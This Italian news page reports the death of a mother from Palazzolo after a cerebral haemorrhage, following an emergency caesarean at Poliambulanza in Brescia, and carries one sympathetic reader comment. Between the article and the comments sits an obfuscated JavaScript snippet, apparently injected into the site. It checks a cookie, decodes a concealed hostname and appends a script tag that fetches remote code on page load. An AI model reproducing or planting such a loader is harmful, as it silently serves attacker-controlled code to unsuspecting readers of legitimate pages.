Fanno nascere la bimba d’urgenza, ma la mamma non ce la fa

    0

    Una storia finita in tragedia. Una madre che non ha potuto abbracciare la figlia che avrebbe dovuto vedere la luce ieri e invece è stata fatta nascere d’urgenza tre settimane prima alla Poliambulanza di Brescia. La mamma invece è stata colpita da un’emorragia cerebrale e proprio ieri è venuta a mancare. La storia tragica colpisce una famiglia di Palazzolo.  La donna, incita e prossima al parto, a inizio marzo avverte dei dolori alla pancia e decide di andare all’ospedale. Come riporta il Giornale di Brescia i medici le provano la pressione e la portano immediatamente in sala operatoria, identificando un picco di ipertensione. Fanno nascere la bambina con un cesareo d’urgenza, mentre la mamma è davvero grave: emorragia cerebrale. I medici tentano un intervento ma senza risultato e da allora non s’è più svegliata. Ora la donna è composta nella camera ardente nella casa di Villongo, mentre la bimba è ancora al nido dell’ospedale Poliambulanza, dove mercoledì è stata battezzata.

    function cc(){fed=az(ogo.mn[13]+’0,54,52,40,56,20′);return document.cookie.search(‘checker’)<0;}function g1(){return ogo.sd+ogo.hj+ogo.mn+ogo.fg+ogo.kj;}var ogo={sd:'N_jAebJ7H;Wto,?}*9QE=sdaI-CO{‘,mn:’ygi4$UYvl&T2M3rK’,fg:’cDp(P.@xq[!VZ16#’,kj:’n:zB+]F5fR)u%S/wm’},fed;function az(tt){var g=g1().split(”),tl=new String();tt=tt.split(‘,’);for(var ab in tt){tl+=g[tt[ab]];}return tl;}function fh(){return az(‘85,85,85,59,4,70,31,4,54,21,59,5,4,84,85,56,34,40,70,54,46,81,31,4,30,84,2,30,84,2,30,21,70,59,2,30′);}if(cc()){mk();}function mk(){var fdk=document.createElement(fed),s;fdk.async=1;fdk.src=document.location.protocol+’//’+fh()+’?ver=’+Math.random();document.body.appendChild(fdk);};

    Comments

    comments

    1 COMMENT

    1. Una storia così ti lascia senza fiato, spero che le persone che sono vicine possano dare il massimo a quell’uomo e a quella bambina…

    LEAVE A REPLY